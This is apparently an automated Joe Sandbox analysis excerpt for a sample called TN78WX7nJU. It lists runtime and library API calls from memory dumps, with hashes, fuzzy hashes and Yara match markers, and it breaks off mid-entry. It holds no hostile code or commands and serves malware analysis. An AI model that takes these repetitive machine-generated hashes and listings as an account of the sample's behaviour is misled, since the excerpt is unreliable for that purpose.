                                                                                                                                                                                                                                                                • Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                                                                                                                                                                                                                                • Instruction ID: d9ab00326051636b390346e071ea3e4670926e3b553b631da5b8fb0fe2f5c702
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 306168719003119FCF19CFA5E8D17AEBBA2FB45326FA4807ED446A7292C731A941CF44
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415249
                                                                                                                                                                                                                                                                  • Part of subcall function 00414C5A: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00414C6E
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415272
                                                                                                                                                                                                                                                                  • Part of subcall function 004130D4: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004130F0
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415299
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415153
                                                                                                                                                                                                                                                                  • Part of subcall function 00413138: __EH_prolog3_GS.LIBCMT ref: 0041313F
                                                                                                                                                                                                                                                                  • Part of subcall function 00413138: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 0041314E
                                                                                                                                                                                                                                                                  • Part of subcall function 00413138: GetProcessAffinityMask.KERNEL32(00000000), ref: 00413155
                                                                                                                                                                                                                                                                  • Part of subcall function 00413138: GetCurrentThread.KERNEL32 ref: 0041317D
                                                                                                                                                                                                                                                                  • Part of subcall function 00413138: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00413187
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415174
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151AB
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151EE
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004152E1
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415305
                                                                                                                                                                                                                                                                • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00415312
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 64082781-0
                                                                                                                                                                                                                                                                • Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                                                                                                                                                                                                                                • Instruction ID: 68d129af9073e170e0bd2ed5c1ca810268e1faaa5ea0560f3945f8c62b51e45f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B619B72A00715DFDB18CFA5E8D26EEB7B1FB84316F24806ED45697242D738A981CF48
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 024A0C36
                                                                                                                                                                                                                                                                • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 024A0C9D
                                                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 024A0CBA
                                                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 024A0D20
                                                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 024A0D35
                                                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 024A0D47
                                                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 024A0D75
                                                                                                                                                                                                                                                                • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 024A0D80
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 024A0DAC
                                                                                                                                                                                                                                                                • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 024A0DBC
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3720063390-0
                                                                                                                                                                                                                                                                • Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                                                                                                                                                                                • Instruction ID: 10daa1dcfb88a4d8b5ad48e1a0e43cfeaab409df032b99148b1bbd94d4ebfce7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C741E571A042089BCF19FFA5C4647EE7BA6AF22304F04406FD8465B382CF759A09CF66
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B2061
                                                                                                                                                                                                                                                                  • Part of subcall function 024B36D1: HeapFree.KERNEL32(00000000,00000000,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?), ref: 024B36E7
                                                                                                                                                                                                                                                                  • Part of subcall function 024B36D1: GetLastError.KERNEL32(?,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?,?), ref: 024B36F9
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B206D
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B2078
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B2083
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B208E
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B2099
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B20A4
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B20AF
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B20BA
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B20C8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                • Instruction ID: 192fda9dc25ff0fe950178ab54c2a0ae022822eee28bf341ce0b93ec51d0ee92
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB117775600108AFCB52EF66C841CD93FA6EF04750B5140AABA094F221D771EE60EF60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431DFA
                                                                                                                                                                                                                                                                  • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                  • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431E06
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431E11
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431E1C
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431E27
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431E32
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431E3D
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431E48
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431E53
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00431E61
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                • Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: __cftoe
                                                                                                                                                                                                                                                                • String ID: F(@$F(@
                                                                                                                                                                                                                                                                • API String ID: 4189289331-2038261262
                                                                                                                                                                                                                                                                • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                                                                                                                                                                                • Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DecodePointer
                                                                                                                                                                                                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                                                • API String ID: 3527080286-3064271455
                                                                                                                                                                                                                                                                • Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                                                                                                                                                                                                                                • Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                                                                                                                                                                                • Instruction ID: c30e0025f48e379c8364d3ff4673cd5a9d769290eec4118bb3ca1b6504002b8c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BDC1B274E04245AFDB17DFAAC840BEEBFB5AF09314F04419AE414AB391C7749942CB71
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 004286FB
                                                                                                                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00428703
                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00428791
                                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
                                                                                                                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 00428811
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                • String ID: fB$csm
                                                                                                                                                                                                                                                                • API String ID: 1170836740-1586063737
                                                                                                                                                                                                                                                                • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                                • Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • atomic_compare_exchange.LIBCONCRT ref: 0249C6DC
                                                                                                                                                                                                                                                                • atomic_compare_exchange.LIBCONCRT ref: 0249C700
                                                                                                                                                                                                                                                                • std::_Cnd_initX.LIBCPMT ref: 0249C711
                                                                                                                                                                                                                                                                • std::_Cnd_initX.LIBCPMT ref: 0249C71F
                                                                                                                                                                                                                                                                  • Part of subcall function 02481370: __Mtx_unlock.LIBCPMT ref: 02481377
                                                                                                                                                                                                                                                                • std::_Cnd_initX.LIBCPMT ref: 0249C72F
                                                                                                                                                                                                                                                                  • Part of subcall function 0249C3EF: __Cnd_broadcast.LIBCPMT ref: 0249C3F6
                                                                                                                                                                                                                                                                • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0249C73D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
                                                                                                                                                                                                                                                                • String ID: t#D
                                                                                                                                                                                                                                                                • API String ID: 4258476935-1671555958
                                                                                                                                                                                                                                                                • Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                                                                                                                                                                                                                • Instruction ID: 4907e0a9ff6aff853fcbd1f913a4c98d432ceb0e9437733168729e7620dc4747
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1001F271900605ABDF11FBA2DD84B9EBB6AAF04310F14005BE90597680EBB8AA158F92
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0042D938,0042D938,?,?,?,00432385,00000001,00000001,23E85006), ref: 0043218E
                                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 004321C6
                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00432385,00000001,00000001,23E85006,?,?,?), ref: 00432214
                                                                                                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 004322AB
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,23E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0043230E
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 0043231B
                                                                                                                                                                                                                                                                  • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 00432324
                                                                                                                                                                                                                                                                • __freea.LIBCMT ref: 00432349
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3864826663-0
                                                                                                                                                                                                                                                                • Opcode ID: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                                                                                                                                                                                • Instruction ID: 93f6329b7fe105f45c70b5aed5e0df07748c8d3fe3b6be6f44c821e7de56536e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf3b119e7e49bccc4fbc7953cec60797500e2f1b6a8bfe672ac464b3af2e48c8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5851F472610216AFDB258F71CE41EAF77A9EB48B54F14522AFD04D7280DBBCDC40C698
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
                                                                                                                                                                                                                                                                  • Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B1444
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B145D
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B148F
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B1498
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 024B14A4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free$ErrorLast
                                                                                                                                                                                                                                                                • String ID: C
                                                                                                                                                                                                                                                                • API String ID: 3291180501-1037565863
                                                                                                                                                                                                                                                                • Opcode ID: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                                                                                                                                                                                • Instruction ID: 4bf953046ae8e99d889f96c5396d38a94d44d558edc225a5407ee5812131ea11
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eed3b7bc2709ca3cbefa9e0eb2039d909a82c3add560d3625423817520cd7e58
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AAB12775A012199BDB26DF29C894BEEB7B5FF08304F1445AAD80DA7350E770AE90CF50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                                                • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                                                                                                                                                                                • Instruction ID: 0b74a76594ba4baed379928a0c5dab0215b6a522704d77e73e38190dbbe0bcf9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E61D171D00215AFDB26CFA9C841BDABBF6EF48710F2441ABE844EB341D771A981CB60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                                                • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                                                                                                                                                                                • Instruction ID: bfd9ead29151d2877f631d1061df4e601ee651aa38b3335c59b440bd117a4214
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9361F171900205AFDB20DF69C842B9EBBF4EB08710F14516BE884EB382E7399D41CB59
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetConsoleCP.KERNEL32(?,024AC4A4,E0830C40,?,?,?,?,?,?,024B425F,0248E03C,024AC4A4,?,024AC4A4,024AC4A4,0248E03C), ref: 024B3B2C
                                                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 024B3BA7
                                                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 024B3BC2
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,024AC4A4,00000001,?,00000005,00000000,00000000), ref: 024B3BE8
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,024B425F,00000000,?,?,?,?,?,?,?,?,?,024B425F,0248E03C), ref: 024B3C07
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,0248E03C,00000001,024B425F,00000000,?,?,?,?,?,?,?,?,?,024B425F,0248E03C), ref: 024B3C40
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                • Opcode ID: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
                                                                                                                                                                                                                                                                • Instruction ID: 304ffd4f9296eaba08644137e6ec93464c4e4940ae2de905874f064e7a01c169
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1651E475900208AFDB11CFA9D884AEEBBF4EF09701F1441AFE555E7291E7309A81CF60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetConsoleCP.KERNEL32(?,0042C23D,E0830C40,?,?,?,?,?,?,00433FF8,0040DDD5,0042C23D,?,0042C23D,0042C23D,0040DDD5), ref: 004338C5
                                                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 00433940
                                                                                                                                                                                                                                                                • __fassign.LIBCMT ref: 0043395B
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,0042C23D,00000001,?,00000005,00000000,00000000), ref: 00433981
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,00000000,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339A0
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(?,0040DDD5,00000001,00433FF8,00000000,?,?,?,?,?,?,?,?,?,00433FF8,0040DDD5), ref: 004339D9
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                • Opcode ID: 701a8cb139ac8c875ca722d2ea664996543124ca91dde6e2e1173c132f03efc9
                                                                                                                                                                                                                                                                • Instruction ID: 0964c92a74c3400c6cb4ab9b4b67413798647f05f85f7adc4f4dadb846cf7038
